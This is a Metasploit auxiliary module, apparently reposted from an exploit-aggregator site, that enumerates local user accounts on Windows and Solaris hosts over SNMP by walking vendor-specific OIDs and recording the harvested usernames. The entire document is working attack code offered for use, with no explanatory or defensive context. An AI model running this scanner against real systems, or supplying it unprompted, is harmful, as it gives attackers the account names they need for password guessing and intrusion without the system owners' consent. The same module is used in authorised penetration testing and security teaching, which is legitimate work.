Share
## https://sploitus.com/exploit?id=PACKETSTORM:180921
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::SNMPClient  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
include SNMP  
  
def initialize  
super(  
'Name' => 'SNMP Windows Username Enumeration',  
'Description' => '  
This module will use LanManager/psProcessUsername OID values to  
enumerate local user accounts on a Windows/Solaris system via SNMP  
',  
'Author' => ['tebo[at]attackresearch.com'],  
'License' => MSF_LICENSE  
)  
end  
  
def run_host(ip)  
peer = "#{ip}:#{rport}"  
begin  
snmp = connect_snmp  
  
sys_desc = snmp.get_value('sysDescr.0')  
if sys_desc.blank? || sys_desc.to_s == 'Null'  
vprint_error("#{peer} No sysDescr received")  
return  
end  
sys_desc = sys_desc.split(/[\r\n]/).join(' ')  
  
sys_desc_map = {  
/Windows/ => '1.3.6.1.4.1.77.1.2.25',  
/Sun/ => '1.3.6.1.4.1.42.3.12.1.8'  
}  
  
matching_oids = sys_desc_map.select { |re, _| sys_desc =~ re }.values  
if matching_oids.empty?  
vprint_warning("#{peer} Skipping unsupported sysDescr: '#{sys_desc}'")  
return  
end  
users = []  
  
matching_oids.each do |oid|  
snmp.walk(oid) do |row|  
row.each { |val| users << val.value.to_s }  
end  
end  
unless users.empty?  
users.sort!  
users.uniq!  
print_good("#{peer} Found #{users.size} users: #{users.join(', ')}")  
end  
  
report_note(  
host: rhost,  
port: rport,  
proto: 'udp',  
sname: 'snmp',  
update: :unique_data,  
type: 'snmp.users',  
data: users  
)  
rescue SNMP::ParseError  
print_error("#{ip} Encountered an SNMP parsing error while trying to enumerate the host.")  
rescue ::SNMP::RequestTimeout, ::SNMP::UnsupportedVersion  
# too noisy for a scanner  
ensure  
disconnect_snmp  
end  
end  
end